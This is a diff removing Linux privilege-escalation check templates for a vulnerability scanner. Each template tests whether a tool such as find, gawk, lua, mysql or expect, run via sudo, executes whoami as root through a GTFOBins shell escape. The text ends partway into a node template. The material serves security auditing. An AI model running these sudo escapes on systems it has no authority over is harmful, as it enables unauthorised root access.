|
||||||
verified: true
|
|
||||||
tags: code,linux,env,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
expect -c 'spawn whoami;interact'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo expect -c 'spawn whoami;interact'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a00473045022060c647f36eb03856e0eaf016f8c04e4bf4100be1884abc528dbadb7d377272500221008e50317abae9efa259ad2a682bc304062fccb32782430543cb1aa2a6c34b32b4:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-expect
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: expect - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
expect is a Unix scripting and testing utility that automates interactive applications such as telnet, ftp, passwd, fsck, rlogin, tip, and more. It uses scripts to control interactive applications, making it useful for automating tasks that involve user input.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/expect/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,expect,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
expect -c 'spawn whoami;interact'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo expect -c 'spawn whoami;interact'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a00473045022100a073cb82c1a879f2dcb9365115bf48040e82ca681024d4ffc00c3fe1069eadea02207a1d5377c689cba96b0c4af6d23866def098d684efedee083f2443b480ac11d4:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-find
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: find - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
The find command in Linux is used to search for files and directories in a directory hierarchy based on various criteria such as name, type, size, and permissions. It is a powerful tool for locating files and performing operations on them, such as executing commands or applying changes.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/find/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,find,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
find . -exec whoami \; -quit
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo find . -exec whoami \; -quit
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4b0a0048304602210088a9e54d22ecaf73f27add5afc616c28d2bae731b36d30b54c1b22a8336842f4022100d0d9b84c518dad57a1d1d9e47f4fb936b0432d75bab077f44feeb0af407cdac5:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-fish
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: fish - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
fish is a user-friendly command-line shell for Unix-like operating systems. It provides features such as syntax highlighting, autosuggestions, and a built-in scripting language. Fish aims to be easy to use and learn, making it a popular choice for both interactive shell usage and scripting.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/fish/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,fish,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
fish -c 'whoami'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo fish -c 'whoami'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a00473045022100b8c37d7d92e15ddf46da724d5b6fc80370b17ad700869f5db2d2773c92fc971c02207927e8db3a6c8d4f5c7ae5d350feee388a6966bfa029f15fdde4a71b1be75bf0:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-flock
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: Flock - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
flock is a command-line utility in Unix-like operating systems that is used to manage file locks. It can be used to synchronize access to a file among multiple processes, preventing conflicts and ensuring data integrity. Additionally, flock can be used in shell scripts to control access to critical sections of code.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/flock/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,flock,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
flock -u / whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo flock -u / whoami
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4b0a00483046022100eaf218a03c71c87c400be7cf0c1a081838f0f82fb83278cd47bb1d442dc806f7022100a9c552cfce0ef36e1b5667fbe535aaf721f8bccb6b7128b9bf15ae5aadfb36f2:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-gawk
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: gawk - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
gawk is the GNU implementation of the AWK programming language. It is a powerful text processing tool that allows for pattern scanning and processing of text files. gawk is commonly used for data extraction, reporting, and manipulation tasks in shell scripts and command-line environments.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/gawk/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,gawk,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
gawk 'BEGIN {system("whoami")}'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo gawk 'BEGIN {system("whoami")}'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a00473045022020f4d974f3c1c91fc22770c9ddc902e1730f238b504ebe4841afce2655b8787e0221008b88f06c877c3cd9a6f631fb933703d0e8cc518cd43814b1d3c4c38cd2e72c3b:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-grc
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: grc - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
grc is a command-line utility that enhances the output of other commands with color and style. It is commonly used to improve the readability of command output by adding color highlighting and formatting. grc can be configured to work with various commands and is often used to make log files and command output easier to interpret.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/grc/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,grc,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
grc --pty whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo grc --pty whoami
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a0047304502203f113d23698935598ff0d77fdf51bf1ca11d3a69f5dc82268a9529bc4da4e3340221008386bd8523a073f3ecf134d4cb0034246089b5f32e4eda4f2fb7e7c847c63978:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-ionice
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: ionice - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
ionice is a command-line utility in Linux that is used to set or get the I/O scheduling class and priority for a program. It allows users to control the I/O priority of a process, which can be useful for managing system resources and improving overall system performance.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/ionice/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,ionice,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
ionice whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo ionice whoami
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 490a0046304402200dc051f60cfa8b06d03cf29eb136b6d42a7ba17cc2e495bd74567b4d43085d1c0220092a4e9e5c1be7c995fa058be2330cede3897eac1aa048b8a16150dc601dfdfa:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-julia
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: Julia - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
Julia is a high-level, high-performance programming language for technical computing. It is designed for numerical and scientific computing, but it is also used for general-purpose programming. Julia is known for its speed and ease of use, and it has a growing community of users and developers.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/julia/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,julia,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
julia -e 'run(`whoami`)'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo julia -e 'run(`whoami`)'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 490a00463044022008cde511c19f2e81af9ea724afbfb70af2b46b90969efa5dd93fc95214e0fe5602200da4093ad99901bf9d7c8d6dc7c222dce24b38ec0de355c37560a48fc5d87e91:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-lftp
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: lftp - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
lftp is a command-line file transfer program for Unix-like systems. It supports various protocols such as FTP, HTTP, SFTP, and FISH, and provides a range of features for file transfer and mirroring. lftp is known for its reliability and scriptability, making it a popular choice for automated file transfer tasks.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/lftp/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,lftp,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
lftp -c '!whoami'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo lftp -c '!whoami'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4b0a004830460221009a7ba137fdf1380d4bc9afe57a3ffa1ecee7a9bbcfb87d7ad307800668bfe4d5022100ed4696a4fea878b8f4cf733026f909ba49c989c54800817c36e8f32e7815c821:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-ltrace
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: ltrace - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
ltrace is a debugging utility in Linux that is used to intercept and record dynamic library calls made by a process. It can be used to trace the library calls made by a program, which is helpful for debugging and understanding its behavior.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/ltrace/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,ltrace,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
ltrace -b -L whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo ltrace -b -L whoami
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4b0a00483046022100a452f6736abe6bbadb861e870601d904d7439ccddb99b99c9813c60890cf6454022100ce8f36f3a3960ccacd29196c18c151075811bca88c4609b018d44611e7da91f4:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-lua
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: lua - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
Lua is a powerful, efficient, lightweight, embeddable scripting language. It is often used as a scripting language for game development and other applications that require a customizable and extensible scripting interface. Lua is known for its simplicity, speed, and ease of integration with other languages and systems.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/lua/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,lua,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
lua -e 'os.execute("whoami")'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo lua -e 'os.execute("whoami")'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a00473045022100fe88d4daba0948f777be6dfe5e85dc1896f8b55009e3cac210034ad321c3e82d02203840fbc951223967db8270b7c5337cb8c464b58b62a5f8563d3d9e48c4804ead:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-mawk
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: mawk - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
mawk is an efficient and fast implementation of the AWK programming language. It is designed to be smaller and faster than the original AWK implementation, making it suitable for large data processing tasks. mawk is commonly used for text processing and pattern scanning in shell scripts and command-line environments.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/mawk/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,mawk,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
mawk 'BEGIN {system("whoami")}'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo mawk 'BEGIN {system("whoami")}'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 490a0046304402200f2fc2cb7ee4195d6ba84734e5816cd6344c1027d789617f593fd573a882798d0220456bbb1bff1ee4887264d39670a7bafd2d3e6e5714ac616b65454e26490b1c50:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-multitime
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: Multitime - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
multitime is a command-line utility that allows for the timing and execution of commands multiple times. It is often used for benchmarking and performance testing of commands and scripts, providing a convenient way to measure the execution time of a given task.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/multitime/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,multitime,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
multitime whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo multitime whoami
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a00473045022100d690fd1752fe80fe6c5d74dd217f1faa159c22b9a1139640caef077da0ca162802201b52fef3e20b018125ed2898a41ee118a709b666e1be56843798f64ad03c4d01:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-mysql
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: MySQL - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
MySQL is an open-source relational database management system (RDBMS) that uses structured query language (SQL) for managing and manipulating data. It is widely used for web applications and is known for its reliability, ease of use, and performance. MySQL is a popular choice for database-driven applications and is supported on various platforms.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/mysql/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,mysql,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
mysql -e '\! whoami'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo mysql -e '\! whoami'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4b0a00483046022100ab3c58233daf1cde6a71b666f1ad59b29abb8f36ac9d2caf325d3ef30dbb7d63022100ee4ec42f3059b0d1e07f5e7b6132d20f247b66f95e28d4cf74587040d390df0b:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-nawk
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: nawk - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
nawk is an implementation of the AWK programming language. It is a text-processing language that is commonly used for pattern scanning and processing of text files. nawk provides powerful features for data extraction, reporting, and manipulation, making it a valuable tool for text processing tasks in shell scripts and command-line environments.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/nawk/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,nawk,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
nawk 'BEGIN {system("whoami")}'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo nawk 'BEGIN {system("whoami")}'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a00473045022100c455bfbade2717cae09e5e1ad5d3f3f32f100dabe62e9ed83960ea513ec0c9190220455786daaf6e8b9213b6921268602b555e67d35000aa1bd4bca08006d233f58e:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-nice
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: Nice - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
In Unix-like operating systems, the nice command is used to execute a program with a modified scheduling priority. It allows users to start a process with a specified priority level, which can influence the allocation of CPU resources. This can be useful for managing system resources and controlling the impact of a process on system performance.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/nice/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,nice,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
nice whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo nice whoami
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a0047304502206658814909d649229bdbe08eca7e6695d1fb07bf9cc2b42e87052ada4c56e87b02210098cecf5578ad70645f6f11e5cabe566e9d602b2f528f764bab48200bd9fc32af:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,55 +0,0 @@
|
||||||
id: privesc-node
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: Node - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
